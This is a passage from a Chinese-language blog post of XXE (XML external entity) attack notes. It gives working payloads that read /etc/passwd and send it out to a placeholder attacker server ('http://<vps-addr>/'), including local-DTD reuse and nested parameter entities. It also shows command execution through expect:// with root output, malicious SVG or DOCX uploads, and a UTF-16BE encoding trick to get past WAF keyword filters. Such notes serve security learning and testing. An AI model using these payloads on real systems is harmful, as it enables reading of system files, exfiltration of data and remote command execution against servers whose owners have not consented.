class="meta-string"><span class="meta"><span class="meta">        &amp;#x25;eval;</span></span></span></span><br><span class="line"><span class="meta-string"><span class="meta"><span class="meta">        &amp;#x25;error;</span></span></span></span><br><span class="line"><span class="meta-string"><span class="meta"><span class="meta">&#x27;</span>&gt;</span></span></span><br><span class="line"><span class="meta">    %condition;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">message</span>&gt;</span>any text<span class="tag">&lt;/<span class="name">message</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是使用bwapp测试没有成功，是解析器差异导致</p>
<p><img src="XXE.assets/image-20210725233950026.png" alt="image-20210725233950026"></p>
<p>​        但是java下测试成功<br><img src="XXE.assets/image-20210725235303517.png" alt="image-20210725235303517"></p>
<h1 id="引用本地DTD"><a href="#引用本地DTD" class="headerlink" title="引用本地DTD"></a>引用本地DTD</h1><p>​        由于XML的广泛使用，各个系统中已经存在了部分DTD文件。如果目标主机的防火墙十分严格，不允许请求外网服务器dtd，可以从外部引入外部DTD文件，并在内部重写一个该dtd文件中含有的参数实体就行。如ubuntu系统自带的/usr/share/yelp/dtd/docbookx.dtd部分内容</p>
<p><img src="XXE.assets/image-20210726004742887.png" alt="image-20210726004742887"></p>
<p>可以使用payload如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;/usr/share/yelp/dtd/docbookx.dtd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">file</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;php://filter/read=convert.base64-encode/resource=file:///etc/passwd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">ISOamso</span> <span class="meta-string">&#x27;&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; send SYSTEM &amp;#x27;http://&lt;vps-addr&gt;/?&amp;#x25;file;&amp;#x27;&gt;&quot;&gt; &amp;#x25;eval;&amp;#x25;send;&#x27;</span>&gt;</span></span></span><br><span class="line"><span class="meta">     %remote;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>

<p>​        虽然在内部重写了该dtd文件中含有的参数实体，但此时调用是在外部，这样仍然可以实现。这里已经是三层参数实体嵌套了，第二层嵌套时我们只需要给定义参数实体的%编码，第三层就需要在第二层的基础上将所有%、&amp;、’、” html编码。</p>
<h2 id="如何找到这个内部-DTD"><a href="#如何找到这个内部-DTD" class="headerlink" title="如何找到这个内部 DTD"></a>如何找到这个内部 DTD</h2><p>如果找不到就会报错，所以可以尝试常见的<code>linux</code>本地<code>DTD</code>文件，比如</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">foo</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">local_dtd</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///usr/share/yelp/dtd/docbookx.dtd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%local_dtd;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过搜索常见 DTD 列表，编写脚本批量请求，确认存在的文件，然后查看该文件，看哪些实体变量可以使用。</p>
<h1 id="内部实体声明中引用实体参数"><a href="#内部实体声明中引用实体参数" class="headerlink" title="内部实体声明中引用实体参数"></a>内部实体声明中引用实体参数</h1><p>​        虽然W3C协议是不允许在内部的实体声明中引用参数实体，但是很多XML解析器并没有很好的执行这个检查。几乎所有XML解析器能够发现如下这种两层嵌套式的：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta">	<span class="meta">&lt;!ENTITY % <span class="meta-keyword">file</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">	<span class="meta">&lt;!ENTITY % <span class="meta-keyword">start</span> <span class="meta-string">&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://&lt;vps-addr&gt;/?%file;&#x27;&gt;&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">	%start;</span></span><br><span class="line"><span class="meta">	%send;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>

<p>实测失败，至少需要PHP中使用为协议编码才可</p>
<h1 id="特殊文件上传处理引起的-XXE"><a href="#特殊文件上传处理引起的-XXE" class="headerlink" title="特殊文件上传处理引起的 XXE"></a>特殊文件上传处理引起的 XXE</h1><p>​        有一些文件是基于 XML 的，如 SVG 图像，DOCX 文档，如果后端在文件上传之后对这些类型的文件进行解析之类，就有可能触发 XXE。这个时候可以传入一个恶意的 SVG 图像触发漏洞。</p>
<h1 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h1><p>​        当PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上时，那么我们就可以执行如下的命令：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 以下代码将尝试与端口8080通信 --&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">GVI</span> [ <span class="meta">&lt;!ELEMENT <span class="meta-keyword">foo</span> <span class="meta-keyword">ANY</span> &gt;</span></span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">xxe</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;expect://id&quot;</span> &gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">catalog</span>&gt;</span></span><br><span class="line">	<span class="symbol">&amp;xxe;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">catalog</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 监听到的内容如下：</span></span><br><span class="line"><span class="comment"> 		 &#123;&quot;error&quot;: &quot;no results for description uid=0(root) gid=0(root) groups=0(root).</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h1><h2 id="关键词被过滤绕过"><a href="#关键词被过滤绕过" class="headerlink" title="关键词被过滤绕过"></a>关键词被过滤绕过</h2><p>ENTITY、SYSTEM、file等关键词被过滤，可使用编码方式绕过：UTF-16BE</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat payload.xml | iconv -f utf-8 -t utf-16be &gt; payload.8-16be.xml</span><br></pre></td></tr></table></figure>

<h2 id="html实体编码绕过"><a href="#html实体编码绕过" class="headerlink" title="html实体编码绕过"></a>html实体编码绕过</h2><p>如果过滤了http等协议，可以利用实体编码绕过</p>
<h2 id="data-协议绕过"><a href="#data-协议绕过" class="headerlink" title="data://协议绕过"></a>data://协议绕过</h2><p>PHP环境下支持data协议，型如：</p>
<h1 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h1><p><a target="_blank" rel="noopener" href="https://rickgray.me/2015/06/08/xml-entity-attack-review/">https://rickgray.me/2015/06/08/xml-entity-attack-review/</a><br><a target="_blank" rel="noopener" href="https://m3lon.github.io/2019/01/20/xxe%E5%AE%9E%E9%AA%8C%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/">https://m3lon.github.io/2019/01/20/xxe%E5%AE%9E%E9%AA%8C%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/</a><br><a target="_blank" rel="noopener" href="https://j7ur8.github.io/WebBook/VUL/%E6%8A%A5%E9%94%99XXE.html">https://j7ur8.github.io/WebBook/VUL/%E6%8A%A5%E9%94%99XXE.html</a><br><a target="_blank" rel="noopener" href="https://www.icode9.com/content-4-1075374.html">https://www.icode9.com/content-4-1075374.html</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/backlion/p/9302528.html">https://www.cnblogs.com/backlion/p/9302528.html</a><br><a target="_blank" rel="noopener" href="https://myt0.com/2020/02/28/xxe%E6%80%BB%E7%BB%93/">https://myt0.com/2020/02/28/xxe%E6%80%BB%E7%BB%93/</a></p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">mlccs</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://mlccs.github.io/2021/08/04/XXE%E5%9F%BA%E7%A1%80/">https://mlccs.github.io/2021/08/04/XXE%E5%9F%BA%E7%A1%80/</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mlccs.github.io">!>-_-<!</a>！</span></div></div></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2021/08/22/JNDI%E6%B3%A8%E5%85%A5%C2%B7%E4%B8%80/"><i class="fas fa-angle-left">&nbsp;</i><span>JNDI注入·一</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2021/08/04/MSSQL%E6%B3%A8%E5%85%A5%C2%B7%E4%B8%80/"><span>MSSQL注入·一</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="copyright">&copy;2021 By mlccs</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>